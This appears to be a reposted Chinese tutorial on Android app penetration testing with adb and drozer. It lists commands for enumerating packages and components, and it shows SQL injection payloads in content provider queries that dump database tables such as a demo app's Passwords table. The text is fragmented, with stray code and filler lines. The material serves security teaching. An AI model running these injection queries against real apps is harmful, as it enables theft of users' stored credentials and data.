-
功能点测试 类似web -
adb调试 框架检测(本文所介绍内容) -
反编译
python2 -m pip install google
python2 -m pip install protobuf
python2 -m pip install OpenSSL
#获取安装包列表
run app.package.list
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
#查看端口及连接
adb devices
#连接模拟器
adb connect 127.0.0.1:62001
#本地端口转发至模拟器
adb forward tcp:31415 tcp:31415
#在确认drozer服务端开启的情况下,输入命令进行连接
drozer console connect
drozer console connect --server ip
[executables]
java=C:Program FilesJavajdk1.8.0_201java.exe
javac=C:Program FilesJavajdk1.8.0_201javac.exe
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#获取安装包列表
run app.package.list
#获取安装包详细信息
run app.package.info -a 包名
#获取目标应用所使用的组件情况
run app.package.attacksurface 包名
#查看目标应用所使用的activity组件详细信息
run app.activity.info -a 包名
#测试其某个activity组件
run app.activity.start --component 包名 activity组件名
#获取Content Providers组件信息
run app.provider.info -a 包名
#列出所使用的URI,并检测是否存在可被获取数据的URI
run scanner.provider.finduris -a 包名
#尝试对某URI进行数据读取
run app.provider.query URI路径
#探测应用中可能存在注入的URI
run scanner.provider.injection -a 包名
#指定URI与参数,并插入单引号验证是否存在注入
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
#尝试构造通用语句(安卓应用大多使用SQLite),列出所有的数据表
run app.provider.query URI --projection "* FROM SQLITE_MASTER WHERE type='table';--"
#指定某个表,对其内容通过注入进行数据获取
run app.provider.query URI --projection "* from Key;--"
原文始发于微信公众号(犀利猪安全):爱住了 | APP渗透测试漏洞实战教程
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论